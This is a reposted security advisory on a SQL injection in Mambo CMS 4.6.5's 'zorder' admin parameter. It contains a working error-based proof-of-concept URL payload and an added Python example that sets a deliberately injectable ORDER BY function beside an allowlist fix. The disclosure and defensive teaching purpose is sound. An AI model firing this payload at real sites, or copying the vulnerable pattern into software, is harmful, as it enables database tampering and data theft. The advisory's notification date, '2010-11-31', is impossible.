Source: 自学PHP网 Time: 2015-04-17 14:47 Author: Views:
[Summary] ========================================= Mambo CMS 4.6.x (4.6.5) | SQL Injection ========================================= 1. Overview: Mambo CMS 4.6.5 and lower contain an injection flaw. 2. Background: Mambo is a full......
=========================================
Mambo CMS 4.6.x (4.6.5) | SQL Injection
=========================================
1. Overview
Mambo CMS 4.6.5 and lower versions contain an SQL injection flaw.
2. Background
Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used all over the world to power government portals, corporate intranets and extranets, ecommerce sites, nonprofit outreach, schools, church, and community sites. Mambo's "power in simplicity" also makes it the CMS of choice for many small businesses and personal sites.
The "zorder" parameter is not properly sanitized when submitted to the administrator/index2.php URL, which allows an attacker to conduct an SQL injection attack. This could allow an attacker to inject or manipulate SQL queries in the back-end database, leading to the manipulation or disclosure of arbitrary data.
Tested on Mambo CMS 4.6.5
http://www.2cto.com /mambo/administrator/index2.php?limit=10&order[]=11&boxchecked=0&toggle=on&search=sqli&task=&limitstart=0&cid[]=on&zorder=-1 OR (SELECT 9999 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,112,101,58),(SELECT (CASE WHEN (9999=9999) THEN 1 ELSE 0 END)),CHAR(58,110,100,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&filter_authorid=62&hidemainmenu=0&option=com_typedcontent
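The root cause described above is a sort parameter pasted straight into an ORDER BY clause. Because a column name or sort expression cannot be passed as a bound query parameter, the correct fix is an allowlist that maps the user-visible sort key to a fixed column name and rejects anything else. The following Python/sqlite3 example is added here for illustration; it is not Mambo's code, and the `content` table, its rows, the `ORDER_COLUMNS` map and the function names are constructed assumptions, not the real Mambo schema.

```python
import sqlite3

# Constructed sample table standing in for a CMS content table (assumption: not the Mambo schema).
SAMPLE_ROWS = [
    (1, "First article", "2010-01-05"),
    (2, "Second article", "2010-02-10"),
    (3, "Third article", "2010-03-15"),
]


def make_db():
    """Build an in-memory database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE content (id INTEGER, title TEXT, created TEXT)")
    conn.executemany("INSERT INTO content VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def list_content_vulnerable(conn, zorder):
    """The flawed pattern: the sort parameter is concatenated into the statement.

    Whatever SQL expression the caller supplies (including subqueries) is
    evaluated by the database, which is exactly what the advisory describes.
    """
    sql = "SELECT id, title FROM content ORDER BY " + zorder
    return conn.execute(sql).fetchall()


# Allowlist: user-visible sort keys mapped to fixed column names.
# Hypothetical keys; a real application lists the columns it actually sorts by.
ORDER_COLUMNS = {"id": "id", "title": "title", "date": "created"}


def build_order_clause(zorder, direction="ASC"):
    """Return a safe ORDER BY clause or raise ValueError for unknown input.

    Only values present in ORDER_COLUMNS are ever placed into the SQL text,
    so the request parameter itself never reaches the query.
    """
    column = ORDER_COLUMNS.get(zorder)
    if column is None:
        raise ValueError("unsupported sort column")
    direction = direction.upper()
    if direction not in ("ASC", "DESC"):
        raise ValueError("unsupported sort direction")
    return f"ORDER BY {column} {direction}"


def list_content_safe(conn, zorder, direction="ASC"):
    """Hardened listing: the ORDER BY text comes only from the allowlist."""
    sql = "SELECT id, title FROM content " + build_order_clause(zorder, direction)
    return conn.execute(sql).fetchall()


def accepts_sort(zorder):
    """True if the allowlist would accept this sort key, False otherwise."""
    try:
        build_order_clause(zorder)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    db = make_db()
    # The vulnerable version happily evaluates a caller-supplied subquery.
    print(list_content_vulnerable(db, "(CASE WHEN (SELECT COUNT(*) FROM content) = 3 THEN -id ELSE id END)"))
    # The hardened version sorts only by allowlisted columns ...
    print(list_content_safe(db, "date", "desc"))
    # ... and rejects the advisory's style of payload outright.
    print(accepts_sort("-1 OR (SELECT 9999 FROM (SELECT COUNT(*)) a)"))
```

Note that the hardened version does not try to "sanitize" the value with escaping or a blacklist of keywords: for identifiers in ORDER BY, parameter binding is unavailable and escaping is the wrong tool, so the only robust control is a closed mapping from accepted keys to column names.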
The vendor appears to have discontinued development. It is recommended to use another CMS in active development.
Mambo CMS Development Team
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
2010-11-31: notified vendor through bug tracker
Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[mambo4.6_x]_sql_injection